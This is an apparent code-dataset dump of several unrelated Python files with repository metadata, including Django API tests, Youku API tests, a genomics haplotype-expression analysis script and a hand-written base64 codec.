hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 248 | max_stars_repo_name stringlengths 5 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 248 | max_issues_repo_name stringlengths 5 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringdate 2015-01-01 00:00:47 2022-03-31 23:42:18 ⌀ | max_issues_repo_issues_event_max_datetime stringdate 2015-01-01 17:43:30 2022-03-31 23:59:58 ⌀ | max_forks_repo_path stringlengths 3 248 | max_forks_repo_name stringlengths 5 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 5 2.06M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.03M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ab9dd6f296e330b5dfe57858dfcb987488e38617 | 1,677 | py | Python | api/tests/test_category.py | KamilJakubczak/budget-api | b1c602b38183b46d09b267a3b848d3dcf5d293c6 | [
"MIT"
] | null | null | null | api/tests/test_category.py | KamilJakubczak/budget-api | b1c602b38183b46d09b267a3b848d3dcf5d293c6 | [
"MIT"
] | 3 | 2020-08-25T18:19:42.000Z | 2022-02-13T19:39:19.000Z | api/tests/test_category.py | KamilJakubczak/budget-api | b1c602b38183b46d09b267a3b848d3dcf5d293c6 | [
"MIT"
] | null | null | null | from django.test import TestCase
from django.urls import reverse
from django.contrib.auth import get_user_model
from rest_framework import status
from rest_framework.test import APIClient
from api.models import Category
category_URL = reverse('api:category-list')
class PublicTestCase(TestCase):
"""
Test for publicy avaialable category API
"""
def setUp(self):
self.client = APIClient()
def test_login_required(self):
"""
Tests if login is required for retriving categorys
"""
res = self.client.get(category_URL)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class ModelTests(TestCase):
def setUp(self):
self.user = get_user_model().objects.create_user(
'testuser',
'supertest'
)
self.client = APIClient()
def test_retrieve_recursd_category_name(self):
category1 = Category.objects.create(name='category1',
user=self.user)
category2 = Category.objects.create(name='category2',
user=self.user,
parent_category=category1)
category3 = Category.objects.create(name='category3',
user=self.user,
parent_category=category2)
expected1 = 'category1'
self.assertEqual(category1.__str__(), expected1)
expected2 = 'category1 - category2'
self.assertEqual(category2.__str__(), expected2)
expected3 = 'category1 - category2 - category3'
self.assertEqual(category3.__str__(), expected3)
| 27.048387 | 71 | 0.618366 |
ab9e9c2eada36636bd43aa94268d3aee76259f10 | 1,989 | py | Python | test/test_users.py | hanguokai/youku | 8032710902411f92e1ae3f280eb121fd7231983b | [
"Apache-2.0"
] | 106 | 2015-01-18T09:02:44.000Z | 2020-10-23T14:32:16.000Z | test/test_users.py | hanguokai/youku | 8032710902411f92e1ae3f280eb121fd7231983b | [
"Apache-2.0"
] | 6 | 2016-10-16T14:17:47.000Z | 2019-09-26T16:42:13.000Z | test/test_users.py | hanguokai/youku | 8032710902411f92e1ae3f280eb121fd7231983b | [
"Apache-2.0"
] | 25 | 2015-01-24T03:01:07.000Z | 2020-05-04T12:23:28.000Z | # -*- coding: utf-8 -*-
import os
import sys
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import unittest
from config import *
from youku import YoukuUsers
class UserTest(unittest.TestCase):
def setUp(self):
self.youku = YoukuUsers(CLIENT_ID)
def test_my_info(self):
me = self.youku.my_info(ACCESS_TOKEN)
self.assertIn('id', me)
def test_by_id(self):
user = self.youku.find_user_by_id('419384312')
self.assertEqual(user['name'], u'韩国恺')
def test_by_ids(self):
users = self.youku.find_users_by_ids('419384312,155482632')
self.assertEqual(users['total'], 2)
def test_by_name(self):
user = self.youku.find_user_by_name(u'GDGBeijing')
self.assertEqual(user['id'], '155482632')
def test_by_names(self):
users = self.youku.find_users_by_names(u'GDGBeijing,韩国恺')
self.assertEqual(users['total'], 2)
def test_friendship_followings(self):
users = self.youku.friendship_followings(user_id='419384312')
self.assertIn('total', users)
def test_friendship_followers(self):
users = self.youku.friendship_followers(user_name='GDGBeijing')
self.assertIn('total', users)
def test_friendship_create_destroy(self):
self.youku.create_friendship(ACCESS_TOKEN, user_name='GDGBeijing')
self.youku.destroy_friendship(ACCESS_TOKEN, user_name='GDGBeijing')
def test_subscribe_create_cancel(self):
self.assertTrue(self.youku.create_subscribe(ACCESS_TOKEN,
'2a7260de1faa11e097c0'))
self.assertTrue(self.youku.cancel_subscribe(ACCESS_TOKEN,
'2a7260de1faa11e097c0'))
def test_subscribe_get(self):
self.assertIn('total', self.youku.subscribe_get(ACCESS_TOKEN))
def test_subscribe_notice(self):
self.assertIn('total', self.youku.subscribe_notice(ACCESS_TOKEN))
if __name__ == '__main__':
unittest.main()
| 32.606557 | 79 | 0.685772 |
aba0d165ccc8910e46a4f5ec4ae38db5c9961875 | 26,044 | py | Python | python/imprinting_analysis/imprinting_analysis.py | jonassibbesen/hamster-project-scripts | 2d470dd028be77c9d866d67d16adc0c17d5ba819 | [
"MIT"
] | 3 | 2021-03-25T08:26:18.000Z | 2022-01-05T08:45:42.000Z | python/imprinting_analysis/imprinting_analysis.py | jonassibbesen/hamster-project-scripts | 2d470dd028be77c9d866d67d16adc0c17d5ba819 | [
"MIT"
] | null | null | null | python/imprinting_analysis/imprinting_analysis.py | jonassibbesen/hamster-project-scripts | 2d470dd028be77c9d866d67d16adc0c17d5ba819 | [
"MIT"
] | 1 | 2021-05-14T21:28:42.000Z | 2021-05-14T21:28:42.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu May 13 12:12:25 2021
@author: Jordan
"""
import sys
import os
import numpy as np
import pandas as pd
import seaborn as sns
import tempfile
import gc
import re
import collections
import gzip
import bisect
import pickle
import itertools
import math
sns.set_style('whitegrid')
# make 2 maps:
# - from transcript ID to row numbers of corresponding haplotype specific transcripts
# - from cluster ID to corresponding transcript IDs
def row_dicts(tab):
tx_rows = {}
cluster_txs = {}
for i in range(tab.shape[0]):
tx_id = tab.Name.values[i].split("_")[0]
clust_id = tab.ClusterID.values[i]
if tx_id not in tx_rows:
tx_rows[tx_id] = []
tx_rows[tx_id].append(i)
if clust_id not in cluster_txs:
cluster_txs[clust_id] = set()
cluster_txs[clust_id].add(tx_id)
for clust_id in cluster_txs:
cluster_txs[clust_id] = sorted(cluster_txs[clust_id])
return tx_rows, cluster_txs
def gene_to_row_dict(tx_rows):
gene_to_tx_rows = {}
for tx_id in tx_id_to_gene:
gene = tx_id_to_gene[tx_id]
if gene not in gene_to_tx_rows:
gene_to_tx_rows[gene] = []
if tx_id in tx_rows:
gene_to_tx_rows[gene].extend(tx_rows[tx_id])
return gene_to_tx_rows
def parse_attr(attr):
attrs = {}
for t in attr.split(";"):
tokens = t.strip().replace("\"", "").split()
if len(tokens) == 0:
continue
tag, val = tokens
attrs[tag] = val
return attrs
def get_haplotypes(chrom, start, end, sample, genotypes):
chrom_start = bisect.bisect_left(genotypes.CHROM.values, chrom)
chrom_end = bisect.bisect_right(genotypes.CHROM.values, chrom)
region_start = bisect.bisect_left(genotypes.POS.values, start, chrom_start, chrom_end)
region_end = bisect.bisect_right(genotypes.POS.values, end, chrom_start, chrom_end)
blocks = []
for i in range(region_start, region_end):
genotype = genotypes[sample].values[i]
phased = "|" in genotype
if len(blocks) == 0 or not phased:
blocks.append({})
al1, al2 = re.split("[\\|\\\\]", genotype)
formatted_alleles = []
for al in (al1, al2):
fal = ""
if al.isdigit():
j = int(al)
if j == 0:
fal = genotypes.REF.values[i]
else:
fal = genotypes.ALT.values[i].split(",")[j - 1]
formatted_alleles.append(fal)
blocks[-1][genotypes.POS.values[i]] = tuple(formatted_alleles)
return blocks
if __name__ == "__main__":
assert(len(sys.argv) == 9)
# gencode annotations
gtf = sys.argv[1]
# list of genes we're interested in
focal_genes = sys.argv[2]
# structured string in format SAMPLE1:rpvg_table1,SAMPLE2:rpvg_table2
tab_string = sys.argv[3]
# structured string in format SAMPLE1:sorted_gibbs_table1,SAMPLE2:sorted_gibbs_table2
gibbs_string = sys.argv[4]
# file constaining list of hst to variant files
hst_variant_list = sys.argv[5]
# file containing list of VCFs (probably reduced to these samples)
vcf_list = sys.argv[6]
# variants for the focal genes in one table
variant_table = sys.argv[7]
# directory for output
out_dir = sys.argv[8]
tabs = []
samples = []
for tab_sample in tab_string.split(","):
assert(":" in tab_sample)
samp, tab = tab_sample.split(":")
tabs.append(tab)
samples.append(samp)
gibbs_tabs = []
gibbs_samples = []
for tab_sample in gibbs_string.split(","):
assert(":" in tab_sample)
samp, tab = tab_sample.split(":")
gibbs_tabs.append(tab)
gibbs_samples.append(samp)
assert(samples == gibbs_samples)
assert(os.path.isdir(out_dir))
assert(os.path.exists(gtf))
assert(os.path.exists(focal_genes))
assert(os.path.exists(vcf_list))
for tab in tabs:
assert(os.path.exists(tab))
for tab in gibbs_tabs:
assert(os.path.exists(tab))
vcfs = []
with open(vcf_list) as f:
for line in f:
if type(line) == bytes:
line = line.decode("utf-8")
vcf = line.strip()
assert(os.path.exists(vcf))
vcfs.append(vcf)
# make a look table for the file name by chromosome
hst_variant_files = {}
with open(hst_variant_list) as f:
for line in f:
if type(line) == bytes:
line = line.decode("utf-8")
fname = line.strip()
with open(fname) as hst_f:
#skip the header
next(hst_f)
hst_line = next(hst_f)
if type(hst_line) == bytes:
hst_line = hst_line.decode("utf-8")
hst_variant_files[hst_line.split()[0]] = fname
tmpdir = tempfile.TemporaryDirectory()
tmppref = tmpdir.name
###############
focal_genes_set = set()
for line in open(focal_genes):
if type(line) == bytes:
line = line.decode("utf-8")
focal_genes_set.add(line.strip().split()[0])
###############
# load the GTF
gencode = pd.read_csv(gtf, sep = "\t", header = None, skiprows = list(range(5)))
gencode.columns = ["chr", "src", "type", "start", "end", "score", "strand", "frame", "attr"]
gencode['chr'] = gencode['chr'].apply(str)
###############
print("loading gene annotations...", file = sys.stderr)
# parse the GTF into useful indexes
gene_coords = {}
tx_models = {}
tx_id_to_name = {}
tx_id_to_gene = {}
exonic_regions = {}
for i in range(gencode.shape[0]):
attrs = parse_attr(gencode.attr.values[i])
gene = attrs["gene_id"]
if gene not in tx_models:
tx_models[gene] = {}
chrom = gencode.chr.values[i]
if chrom.startswith("chr"):
chrom = chrom[3:]
if gene in tx_models:
if gencode.type.values[i] == "gene":
gene_coords[gene] = (chrom, gencode.start.values[i], gencode.end.values[i])
elif gencode.type.values[i] == "exon":
tx_id = attrs["transcript_id"]
if tx_id not in tx_models[gene]:
tx_models[gene][tx_id] = []
tx_models[gene][tx_id].append((chrom, gencode.start.values[i], gencode.end.values[i]))
###############
tx_id_to_gene[tx_id] = gene
###############
if "transcript_id" in attrs and "transcript_name" in attrs:
tx_id_to_name[attrs["transcript_id"]] = attrs["transcript_name"]
###############
if gencode.type.values[i] == "exon":
if chrom not in exonic_regions:
exonic_regions[chrom] = []
exonic_regions[chrom].append([gencode.start.values[i], gencode.end.values[i]])
###############
# reverse the transcript gene table
gene_to_tx_ids = {}
for tx_id in tx_id_to_gene:
gene = tx_id_to_gene[tx_id]
if gene not in gene_to_tx_ids:
gene_to_tx_ids[gene] = []
gene_to_tx_ids[gene].append(tx_id)
###############
all_genes = sorted(gene_to_tx_ids)
###############
# collapse the exonic regions that overlap
for chrom in exonic_regions:
i, j = 0, 0
intervals = exonic_regions[chrom]
intervals.sort()
while j < len(intervals):
if intervals[j][0] <= intervals[i][1]:
intervals[i][1] = max(intervals[i][1], intervals[j][1])
else:
i += 1
intervals[i] = intervals[j]
j += 1
while len(intervals) > i + 1:
intervals.pop()
###############
# this is a big table and we don't need it any more, clear it out
del gencode
gc.collect()
###############
print("computing credible intervals...", file = sys.stderr)
sample_tx_cred_intervals = {}
for samp, tab in zip(gibbs_samples, gibbs_tabs):
tx_cred_intervals = []
sample_tx_cred_intervals[samp] = tx_cred_intervals
def record_cred_interval(hst_exprs, credibility):
if len(hst_exprs) == 0:
return
for hst1, hst2 in sorted(set(tuple(sorted(pair)) for pair in itertools.combinations(hst_exprs, 2))):
ratios = []
hst1_expr = hst_exprs[hst1]
hst2_expr = hst_exprs[hst2]
assert(len(hst1_expr) == len(hst2_expr))
for i in range(len(hst1_expr)):
if hst1_expr[i] == 0.0 or hst2_expr[i] == 0.0:
# log ratio undefined if either is 0
continue
ratios.append(math.log(hst1_expr[i] / hst2_expr[i], 2.0))
if len(ratios) == 0:
continue
# find the credible interval
ratios.sort()
i1 = min(int(round(len(ratios) * (1.0 - credibility) / 2.0)), len(ratios) - 1)
i2 = min(int(round(len(ratios) * (1.0 - (1.0 - credibility) / 2.0))), len(ratios) - 1)
r1 = ratios[i1]
r2 = ratios[i2]
tx_cred_intervals.append((hst1, hst2, r1, r2))
# take either gzip or unzipped file
f = None
if tab.endswith(".gz"):
f = gzip.open(tab)
else:
f = open(tab)
# the credibility i'm using
credibility = .9
curr_tx = None
hst_gibbs_exprs = None
txs_seen = set()
for line in f:
if type(line) == bytes:
line = line.decode("utf-8")
if line.startswith("Name"):
# skip the header
continue
tokens = line.split()
hst = tokens[0]
tx = hst.split("_")[0]
if tx != curr_tx:
# were on to a new transcript, make sure we haven't seen it before
assert(tx not in txs_seen)
txs_seen.add(tx)
if curr_tx is not None:
# record the ratios of the HSTs for the previous transcript
record_cred_interval(hst_gibbs_exprs, credibility)
# fresh data structures for this transcript
curr_tx = tx
hst_gibbs_exprs = {}
# record the row of expression values
hst_gibbs_exprs[hst] = [float(tokens[i]) for i in range(2, len(tokens))]
if curr_tx is not None:
# the final transcript
record_cred_interval(hst_gibbs_exprs, credibility)
sample_tx_cred_intervals_output = os.path.join(out_dir, "sample_tx_cred_intervals.pkl")
with open(sample_tx_cred_intervals_output, "wb") as f:
pickle.dump(sample_tx_cred_intervals, f)
###############
print("loading genotypes...", file = sys.stderr)
genotypes = pd.read_csv(variant_table, sep = "\t")
genotypes['CHROM'] = genotypes['CHROM'].apply(str)
genotypes.sort_values(["CHROM", "POS"], inplace = True)
genotypes = genotypes.loc[np.invert(genotypes.duplicated()),:]
#################
print("loading HST variants...", file = sys.stderr)
hst_variants = {}
for hst_file in hst_variant_files.values():
hst_table = pd.read_csv(hst_file, sep = "\t", header = 0)
hst_table['Chrom'] = hst_table['Chrom'].apply(str)
for i in range(hst_table.shape[0]):
if type(hst_table.HSTs.values[i]) == float:
# this seems to happen when the list of HSTs is empty
continue
hsts = hst_table.HSTs.values[i].split(",")
for hst in hsts:
tx = hst.split("_")[0]
gene = tx_id_to_gene[tx]
if not gene in focal_genes_set:
continue
if not hst in hst_variants:
hst_variants[hst] = []
var = (hst_table.Pos.values[i], hst_table.Allele.values[i])
hst_variants[hst].append(var)
del hst_table
gc.collect()
#################
sample_higher_haplo_expr = {}
sample_lower_haplo_expr = {}
sample_informative_expr = {}
sample_haplo_1_is_higher = {}
sample_haplo_hsts = {}
for i in range(len(tabs)):
sample = samples[i]
tab = tabs[i]
print("computing haplotype expression for sample {}...".format(sample), file = sys.stderr)
sample_expr = pd.read_csv(tab, sep = "\t")
sample_tx_rows, sample_cluster_txs = row_dicts(sample_expr)
higher_haplo_expr = {}
lower_haplo_expr = {}
informative_expr = {}
haplo_1_is_higher = {}
haplo_hsts = {}
sample_higher_haplo_expr[sample] = higher_haplo_expr
sample_lower_haplo_expr[sample] = lower_haplo_expr
sample_informative_expr[sample] = informative_expr
sample_haplo_1_is_higher[sample] = haplo_1_is_higher
sample_haplo_hsts[sample] = haplo_hsts
for gene in focal_genes_set:
chrom, start, end = gene_coords[gene]
blocks = get_haplotypes(chrom, start, end, sample, genotypes)
if len(blocks) > 1:
print("sample {} has {} phase blocks on gene {}, skipping".format(sample, len(blocks), gene), file = sys.stderr)
continue
block = blocks[0]
if not gene in higher_haplo_expr:
higher_haplo_expr[gene] = {}
lower_haplo_expr[gene] = {}
informative_expr[gene] = {}
gene_higher_haplo_expr = higher_haplo_expr[gene]
gene_lower_haplo_expr = lower_haplo_expr[gene]
gene_informative_expr = informative_expr[gene]
haplo_1_expr = {}
haplo_2_expr = {}
for tx_id in gene_to_tx_ids[gene]:
haplo_1_expr[tx_id] = 0.0
haplo_2_expr[tx_id] = 0.0
total_informative_expr = 0.0
haplo_hsts[tx_id] = [None, None]
for i in sample_tx_rows[tx_id]:
ex = sample_expr.TPM.values[i]
hst = sample_expr.Name.values[i]
match_1 = True
match_2 = True
for pos, allele in hst_variants[hst]:
hap_1, hap_2 = block[pos]
match_1 = match_1 and allele == hap_1
match_2 = match_2 and allele == hap_2
if match_1 and not match_2:
haplo_hsts[tx_id][0] = hst
haplo_1_expr[tx_id] += ex
elif match_2 and not match_1:
haplo_hsts[tx_id][1] = hst
haplo_2_expr[tx_id] += ex
if not (match_1 and match_2):
total_informative_expr += ex
if not tx_id in gene_informative_expr:
gene_informative_expr[tx_id] = []
gene_informative_expr[tx_id].append(total_informative_expr)
if sum(haplo_1_expr.values()) > sum(haplo_2_expr.values()):
higher = haplo_1_expr
lower = haplo_2_expr
haplo_1_is_higher[gene] = True
else:
lower = haplo_1_expr
higher = haplo_2_expr
haplo_1_is_higher[gene] = False
for tx_id in higher:
if not tx_id in gene_higher_haplo_expr:
gene_higher_haplo_expr[tx_id] = []
gene_lower_haplo_expr[tx_id] = []
gene_higher_haplo_expr[tx_id].append(higher[tx_id])
gene_lower_haplo_expr[tx_id].append(lower[tx_id])
#################
higher_haplo_output = os.path.join(out_dir, "sample_higher_haplo_expr.pkl")
with open(higher_haplo_output, "wb") as f:
pickle.dump(sample_higher_haplo_expr, f)
lower_haplo_output = os.path.join(out_dir, "sample_lower_haplo_expr.pkl")
with open(lower_haplo_output, "wb") as f:
pickle.dump(sample_lower_haplo_expr, f)
informative_output = os.path.join(out_dir, "sample_informative_expr.pkl")
with open(informative_output, "wb") as f:
pickle.dump(sample_informative_expr, f)
which_haplo_output = os.path.join(out_dir, "sample_haplo_1_is_higher.pkl")
with open(which_haplo_output, "wb") as f:
pickle.dump(sample_haplo_1_is_higher, f)
haplo_hsts_output = os.path.join(out_dir, "sample_haplo_hsts.pkl")
with open(haplo_hsts_output, "wb") as f:
pickle.dump(sample_haplo_hsts, f)
###############
print("identifying heterozygous variants...", file = sys.stderr)
inf = 2**62
het_positions = {}
for vcf in vcfs:
with gzip.open(vcf) as f:
samps = None
for line in f:
if type(line) == bytes:
line = line.decode("utf-8")
if line.startswith("##"):
continue
if line.startswith("#"):
samps = line.rstrip().split("\t")[9:]
for sample in samps:
if sample not in het_positions:
het_positions[sample] = set()
else:
tokens = line.rstrip().split("\t")
assert(len(tokens) == len(samps) + 9)
chrom_exonic_regions = exonic_regions[tokens[0]]
chrom = tokens[0]
pos = int(tokens[1])
idx = bisect.bisect(chrom_exonic_regions, [pos, inf])
if idx == 0:
# before the first exon
continue
elif chrom_exonic_regions[idx - 1][1] < pos:
# in between exons
continue
for i in range(9, len(tokens)):
genotype = tokens[i]
samp = samps[i - 9]
if "|" in genotype or "\\" in genotype:
al1, al2 = re.split("[\\|\\\\]", genotype)
if al1 != al2:
het_positions[samp].add((chrom, pos))
gc.collect()
###############
all_gene_intervals = sorted((interval[0], interval[1], interval[2], gene) for gene, interval in gene_coords.items())
sample_het_balance = {}
for i in range(len(tabs)):
tab = tabs[i]
sample = samples[i]
if sample not in sample_het_balance:
sample_het_balance[sample] = {}
het_balance = sample_het_balance[sample]
print("computing balance for sample {}".format(sample), file = sys.stderr)
buffer = collections.deque()
prev_chrom = None
tokens = None
pos = None
filesize = None
hst_file = None
gene_num = 0
sample_expr = pd.read_csv(tab, sep = "\t")
sample_tx_rows, sample_cluster_txs = row_dicts(sample_expr)
for chrom, start, end, gene in all_gene_intervals:
gene_num += 1
if gene_num % 2500 == 0:
print("processing gene {}".format(gene_num), file = sys.stderr)
gene_hst_variants = {}
if prev_chrom != chrom:
# we've switched chromosomes to a new file
if not chrom in hst_variant_files:
continue
hst_table = hst_variant_files[chrom]
#print("starting chrom {}".format(chrom), file = sys.stderr)
hst_file = open(hst_table)
filesize = os.fstat(hst_file.fileno()).st_size
# skip the header
hst_file.readline()
buffer.clear()
tell = hst_file.tell()
prev_pos = -1
tokens = hst_file.readline().strip().split()
var_chrom = tokens[0]
pos = int(tokens[1])
buffer.append((pos, tell))
# advance through rows that are strictly before this gene
while pos < start:
tell = hst_file.tell()
if tell == filesize:
break
prev_pos = pos
tokens = hst_file.readline().strip().split()
pos = int(tokens[1])
if pos != prev_pos:
buffer.append((pos, tell))
# remove any part of the buffer before this gene
while len(buffer) > 0:
buf_pos = buffer[0][0]
if buf_pos < start:
buffer.popleft()
else:
break
if len(buffer) > 0:
# everything before the start has been removed, except the current row
buf_pos, tell = buffer[0]
if buf_pos < pos:
# this occurred strictly before the current row, so we need to seek
# backwards
# reset the part of the buffer to the right of where we're seeking to
while len(buffer) > 1:
buffer.pop()
hst_file.seek(tell)
tokens = hst_file.readline().strip().split()
pos = int(tokens[1])
hst_vars = {}
# iterate over rows in the gene
while pos <= end:
if len(tokens) >= 5:
allele = tokens[3]
pos = int(tokens[1])
hsts = tokens[4].split(",")
for hst in hsts:
if hst not in hst_vars:
hst_vars[hst] = []
hst_vars[hst].append((pos, allele))
tell = hst_file.tell()
if tell == filesize:
# we hit the end of the file
break
prev_pos = pos
tokens = hst_file.readline().strip().split()
pos = int(tokens[1])
if pos != prev_pos:
# this is the first row we've seen with this position, remember
# it in the buffer
buffer.append((pos, tell))
prev_chrom = chrom
if gene not in het_balance:
het_balance[gene] = []
var_expr = {}
if gene not in gene_to_tx_ids:
continue
for tx_id in gene_to_tx_ids[gene]:
#print("looking at expression for tx " + tx_id, file = sys.stderr)
if tx_id not in sample_tx_rows:
continue
for i in sample_tx_rows[tx_id]:
ex = sample_expr.TPM.values[i]
if ex == 0.0:
continue
hst = sample_expr.Name.values[i]
#print("\thst " + hst + " has positive expression " + str(ex), file = sys.stderr)
if hst not in hst_vars:
# must not overlap any variants
continue
for var in hst_vars[hst]:
if var not in var_expr:
var_expr[var] = 0.0
var_expr[var] += ex
alleles = {}
for pos, allele in var_expr:
if pos not in alleles:
alleles[pos] = []
alleles[pos].append(allele)
for pos in alleles:
if (chrom, pos) not in het_positions[sample]:
continue
#print("looking at expression for pos " + chrom + " " + str(pos), file = sys.stderr)
total_expr = sum(var_expr[(pos, allele)] for allele in alleles[pos])
highest_expr = max(var_expr[(pos, allele)] for allele in alleles[pos])
#print("highest expr " + str(highest_expr) + ", total " + str(total_expr), file = sys.stderr)
het_balance[gene].append((highest_expr, total_expr))
del sample_expr
del sample_tx_rows
del sample_cluster_txs
gc.collect()
#################
balance_output = os.path.join(out_dir, "sample_het_balance.pkl")
with open(balance_output, "wb") as f:
pickle.dump(sample_het_balance, f)
tx_models_output = os.path.join(out_dir, "tx_models.pkl")
with open(tx_models_output, "wb") as f:
pickle.dump(tx_models, f)
tx_id_to_name_output = os.path.join(out_dir, "tx_id_to_name.pkl")
with open(tx_id_to_name_output, "wb") as f:
pickle.dump(tx_id_to_name, f)
| 35.05249 | 128 | 0.507986 |
aba36294bade63b92b2258cf8156dbcd7056f857 | 173 | py | Python | server/users/urls.py | Egor4ik325/chaticket | 023fb2c533268b020b01f1580404ae30af1b231a | [
"MIT"
] | null | null | null | server/users/urls.py | Egor4ik325/chaticket | 023fb2c533268b020b01f1580404ae30af1b231a | [
"MIT"
] | 1 | 2021-09-25T20:53:22.000Z | 2021-09-25T20:53:22.000Z | server/users/urls.py | Egor4ik325/chaticket | 023fb2c533268b020b01f1580404ae30af1b231a | [
"MIT"
] | null | null | null |
from rest_framework.routers import DefaultRouter
from .views import UserViewSet
router = DefaultRouter()
router.register('users', UserViewSet)
urlpatterns = router.urls
| 17.3 | 48 | 0.809249 |
aba3ca3cb2abe792a4ee6dcd8344c35aa3650122 | 430 | py | Python | donkeycar/parts/model_wrappers/__init__.py | augustin-barillec/tortue-rapide | 92dbde0a98bfabbedf3bc3502fc648d254ac330a | [
"MIT"
] | 12 | 2019-05-28T17:57:57.000Z | 2022-01-14T14:46:30.000Z | donkeycar/parts/model_wrappers/__init__.py | augustin-barillec/tortue-rapide | 92dbde0a98bfabbedf3bc3502fc648d254ac330a | [
"MIT"
] | 7 | 2019-12-16T22:09:49.000Z | 2021-09-12T15:35:41.000Z | donkeycar/parts/model_wrappers/__init__.py | augustin-barillec/tortue-rapide | 92dbde0a98bfabbedf3bc3502fc648d254ac330a | [
"MIT"
] | 2 | 2021-01-24T15:31:57.000Z | 2021-07-28T17:23:29.000Z | from donkeycar.parts.model_wrappers.Angle5FlipSharpThrottleOn import Angle5FlipSharpThrottleOn
from donkeycar.parts.model_wrappers.Angle5ifelse import Angle5ifelse
from donkeycar.parts.model_wrappers.Angle3ifelse import Angle3ifelse
from donkeycar.parts.model_wrappers.Angle3speedy import SpeedyFranklin3choices
from donkeycar.parts.model_wrappers.Angle51 import Angle51
from donkeycar.parts.model_wrappers.Angle52 import Angle52
| 61.428571 | 94 | 0.902326 |
aba42aace3da5a22bb64d7c6415ae3217f5a8a2c | 589 | py | Python | old sources/loops.py | archang3l-media/neuroscience-master | e435a6d38d84afede65a8a406d28a4dc3e473f30 | [
"MIT"
] | null | null | null | old sources/loops.py | archang3l-media/neuroscience-master | e435a6d38d84afede65a8a406d28a4dc3e473f30 | [
"MIT"
] | null | null | null | old sources/loops.py | archang3l-media/neuroscience-master | e435a6d38d84afede65a8a406d28a4dc3e473f30 | [
"MIT"
] | null | null | null | my_list = ['banana', 'strawberry', 'apple', 'watermelon', 'peach'] #a simple list
sorted_list = sorted(my_list) #python includes powerful sorting algorithms
for x in range(1,11,1): #a for loop which counts to ten
"""range takes up to three arguments: the start, which is
inclusive, the end, which is exclusive and the step size"""
print(x)
print() #prints an empty line
for y in range(10,0,-1): #the step size can also be negative to count backwards
print(y)
print()
for z in range(len(sorted_list)): #you can also iterate over lists
print (sorted_list[z])#prints the list
| 45.307692 | 81 | 0.718166 |
aba5a20bb67be074c4810bf3da7c2a271409d71b | 2,146 | py | Python | encdecpy/base64.py | IronVenom/encdecpy | cca838765e55af846484eebb71f1f49645d147c6 | [
"MIT"
] | 9 | 2019-04-16T18:50:48.000Z | 2022-03-15T11:57:02.000Z | encdecpy/base64.py | IronVenom/encdecpy | cca838765e55af846484eebb71f1f49645d147c6 | [
"MIT"
] | null | null | null | encdecpy/base64.py | IronVenom/encdecpy | cca838765e55af846484eebb71f1f49645d147c6 | [
"MIT"
] | 1 | 2021-08-13T16:00:28.000Z | 2021-08-13T16:00:28.000Z | # Dictionaries for base64 encoding and decoding.
encode_dict = {0:'A',1:'B',2:'C',3:'D',4:'E',5:'F',6:'G',7:'H',8:'I',9:'J',10:'K',11:'L',12:'M',13:'N',14:'O',15:'P',16:'Q',17:'R',18:'S',19:'T',20:'U',21:'V',22:'W',
23:'X',24:'Y',25:'Z',26:'a',27:'b',28:'c',29:'d',30:'e',31:'f',32:'g',33:'h',34:'i',35:'j',36:'k',37:'l',38:'m',39:'n',40:'o',41:'p',42:'q',43:'r',44:'s'
,45:'t',46:'u',47:'v',48:'w',49:'x',50:'y',51:'z',52:'0',53:'1',54:'2',55:'3',56:'4',57:'5',58:'6',59:'7',60:'8',61:'9',62:'+',63:"/"}
decode_dict = {a:b for b,a in encode_dict.items()}
class base64:
def encode(string):
binstream = ''
for i in string:
binstream+='0'*(8-len(f"{ord(i):b}"))+f"{ord(i):b}"
extra = 0
if len(binstream)%3!=0:
if len(binstream)%3 == 2:
binstream = '0'*16 + binstream
extra = 1
else:
binstream = '0'*8 + binstream
extra = 2
encode_bin = []
for i in range(0,int(len(binstream)//6)):
encode_bin.append(binstream[6*i:6*(i+1):1])
encoded_string = ''
for i in encode_bin:
encoded_string+=encode_dict[int(i,2)]
return encoded_string+'='*extra
def decode(string):
decode_stream = ''
newstring = ''
if string[-1] == '=':
if string[-2] == '=':
newstring = string[:-2]
for i in newstring:
decode_stream+='0'*(6-len(f"{decode_dict[i]:b}"))+f"{decode_dict[i]:b}"
decode_l = []
decode_stream = '0'*8 + decode_stream
for i in range(0,int(len(decode_stream)/8)):
decode_l.append(chr(int(decode_stream[i*8:8*(i+1):1],2)))
return ''.join(decode_l[2:])
else:
newstring = string[:-1]
for i in newstring:
decode_stream+='0'*(6-len(f"{decode_dict[i]:b}"))+f"{decode_dict[i]:b}"
decode_l = []
decode_stream = '0'*16 + decode_stream
for i in range(0,int(len(decode_stream)/8)):
decode_l.append(chr(int(decode_stream[i*8:8*(i+1):1],2)))
return ''.join(decode_l[4:])
else:
for i in string:
decode_stream+='0'*(6-len(f"{decode_dict[i]:b}"))+f"{decode_dict[i]:b}"
decode_l = []
for i in range(0,int(len(decode_stream)/8)):
decode_l.append(chr(int(decode_stream[i*8:8*(i+1):1],2)))
return ''.join(decode_l) | 34.612903 | 166 | 0.567102 |
aba69264e1ac48abb0bcfe70f1af9670b4edc6a2 | 590 | py | Python | views/windows/basewindow.py | RamonWill/portfolio-management-project | ac8ce313f8d62f09810fc1da19d6b252f193871b | [
"MIT"
